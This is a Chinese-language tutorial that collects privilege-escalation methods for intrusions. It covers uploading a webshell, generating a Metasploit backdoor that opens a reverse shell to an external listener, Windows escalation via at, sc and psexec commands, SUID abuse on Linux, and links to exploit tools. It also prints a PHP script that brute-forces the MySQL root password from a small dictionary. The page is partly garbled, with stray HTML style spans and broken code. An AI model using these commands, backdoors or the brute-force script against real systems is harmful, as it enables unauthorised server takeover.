實戰遇見到的好用提權方法集合
權限提升對我們在深度滲透過程中起著重要作用,接下來我將介紹web提權、本地提權、數據庫提權、linux提權。
權限的劃分
1、system賬戶
Windows系統最高級別的權限是System用戶權限,有一些操作需要System權限才能完成,比如修改注冊表核心鍵值、強制結束惡意應用程序進程等。
2、管理員賬戶
具有最高的管理和使用權限,能改變系統所有設置,可以安裝和刪除程序,能訪問計算機上所有的文件。除此之外,它還擁有控制其他用戶的權限。
3、普通用戶賬戶
某些功能的使用,是受到一定限制的賬戶,在系統中可以創建多個此類賬戶,也可以改變其賬戶類型。該賬戶可以訪問已經安裝在計算機上的程序,可以設置自己賬戶的圖片、密碼等,但無權更改大多數計算機的設置。
Web提權
獲取網站權限后,我們僅僅只能對網站操作,無法對服務器進行操作,需要對服務器進行提權,獲取到更高權限。
案例演示
1.上傳后門文件,獲取到webshell權限

2.在web權限提升中,最常用的是溢出漏洞提權,用cmd去執行文件進行提權,從下圖可以清晰的看到我們在webshell看到的權限和服務器上看到的權限是不一樣的。

3.利用systeminfo進行信息收集,一般關注操作系統版本,打過的補丁編號。

4.獲取到補丁編號后,我們要進行補丁篩選,推薦兩個優秀項目:wesng , windowsVulnScan。將上面收集到的信息保存到1.txt中,利用wesng進行補丁篩選
下載地址分別為:
https://github.com/bitsadmin/wesng
https://github.com/chroblert/WindowsVulnScan

5.執行完后會將可能存在的漏洞保存在vuln.csv中

6.利用MSF或特定EXP進行提權(msf要搭建在外網,才能將會話反彈到本機,內網不能反彈)生成一個5577.exe后門,webshell執行該后門,反彈的端口號為5577
Msf安裝教程:http://www.ttk7.cn/post-27.html

7.設置監聽端口為5577

8.端口反彈的權限為web權限

9.利用wesng中收集到的漏洞編號,進行模塊利用,并且設置反彈端口,此時的端口號應該與前面的不同,這個端口反彈的權限為提權后的權限,并且監聽的回話為3,與上面的會話對應

10.成功反彈system權限

本地提權
獲取本地普通用戶的權限后,要將權限提升為更高權限,本地提權的成功概率比web提權更高。
案例演示
1.系統溢出漏洞提權
直接網上下載BitsArbitraryFileMoveExploit.exe,運行就可以提升為系統權限
2.AT命令提權:
at 13:36 /interactive cmd.exe (在13:36分生成一個交互式的System權限的cmd)
使用版本:Win2000 & Win2003 & XP

3.SC命令提權:
sc Create syscmd binPath= “cmd /K start” type= own type= interact #創建一個名叫syscmd的新的交互式的cmd服務
sc start syscmd #得到了system權限的cmd環境
適用版本:windows 7、8、03、08

4.PS命令提權
微軟工具包:https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools
psexec.exe -accepteula -s -i -d cmd.exe
適用版本:Win2003 & Win2008

數據庫提權
Mysql數據庫提權
利用UDF提權
在利用UDF提權時前提是我們需要知道數據庫的密碼,而在正常情況下MySQL數據庫不支持外連,此時如果我們用工具爆破不了,可以上傳腳本進行爆破,腳本如下:
</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);font-family: "Microsoft YaHei", 微軟雅黑, "Hiragino Sans GB", STXihei, 華文細黑, STHeiti, RobotoDraft, Roboto, "Helvetica Neue", Helvetica, Tahoma, "Droid Sans", "wenquanyi micro hei", FreeSans, Arimo, Arial, SimSun, 宋體, Heiti, 黑體, sans-serif;">Mysql賬號密碼爆破工具</span><span style="box-sizing: border-box;color: rgb(0, 0, 136);font-family: "Microsoft YaHei", 微軟雅黑, "Hiragino Sans GB", STXihei, 華文細黑, STHeiti, RobotoDraft, Roboto, "Helvetica Neue", Helvetica, Tahoma, "Droid Sans", "wenquanyi micro hei", FreeSans, Arimo, Arial, SimSun, 宋體, Heiti, 黑體, sans-serif;">
etahttp-equiv="Content-Type"content="text/html; charset=utf-8">
MysqlDatab aseBlasting(Mysql賬號密碼在線爆破工具 V1.0)
php
if(@$_POST['submit']){
$host =@$_POST['host'];
if($host!=""){
$username ="root";//用戶名字典
$password = array('','123456','admin','root123','ccf304vn');//密碼字典
echo "
--------------------爆破狀態--------------------
";
echo "密碼錯誤次數:";
for($i=0; $i <= count($password); $i++){
if(@mysql_connect($host, $username, $password[$i])){
echo "
爆破成功--密碼-->".@$password[$i]."";
break;
}else{
echo $i."、";
continue;
}
}
echo "
--------------------爆破結束--------------------
";
}else{
echo "a lert('黑客,輸入數據庫IP地址')";
}
}
?>
action="MysqlDatab aseBlasting.php"method="post">
數據庫IP地址:type="text"name="host"/>
type="submit"value="爆破"name="submit"/>
有些提權網上已經寫得很完整,所以接下來有的提權過程就沒有演示,這是我收集的比較好的文章,請大家參考。https://blog.csdn.net/qq_36119192/article/details/84863268
2.Mssql數據庫提權
請參考:https://www.cnblogs.com/N0r4h/p/12889944.html
3.Oracle數據庫提權
分為以下三種模式:
普通用戶模式
前提是擁有一個普通的Oracle連接賬號,不需要DBA,并以Oracle實例運行的權限執行操作系統命令。
DBA用戶模式
擁有DBA賬號密碼,可以省去自己手動創建存儲過程的繁瑣步驟,一鍵執行測試。
注入提升模式
擁有一個Oracle注入點,可以通過注入點執行系統命令,此種模式沒有實現回顯,需要自己驗證。
一般Oracle數據庫利用這個工具進行提權(自帶以上三種提權方式)
下載地址:https://github.com/jas502n/oracleShell

Linux操作系統提權
推薦兩個開源的項目
信息收集腳本
LinEnum-master:https://github.com/rebootuser/LinEnum
漏洞探針腳本,獲取可能存在的漏洞
linux-exploit-suggester:https://github.com/mzet-/linux-exploit-suggester
在進行linux提權時,推薦使用冰蝎,因為冰蝎里面有很多集成化功能,可以反彈shell到msf中。
下載地址:https://github.com/rebeyond/Behinder
案例演示
1.SUID提權
漏洞成因:在對文件進行權限設置時,給了文件suid權限,在執行該文件時,會調用特定用戶
上傳一個腳本到網站,利用冰蝎連接,設置反彈shell

在msf中執行上面的命令,web權限反彈到msf中

上傳漏洞探針腳本,并執行,查看是否有suid提權的可能性

執行一下命令,成功提升為root用戶
touch shenghuo
find shenghuo -exec whoami \;
2.內核漏洞提權
在內核漏洞提權時,前提要是本地用戶才能進行提權
請參考:https://www.moonsec.com/archives/379
3.臟牛提權
請參考:https://www.cnblogs.com/xiaozi/p/13370721.html
4.定時任務提權
請參考:https://www.yidc.net/archives/4380
5.環境變量提權
請參考:https://www.freebuf.com/articles/system/173903.html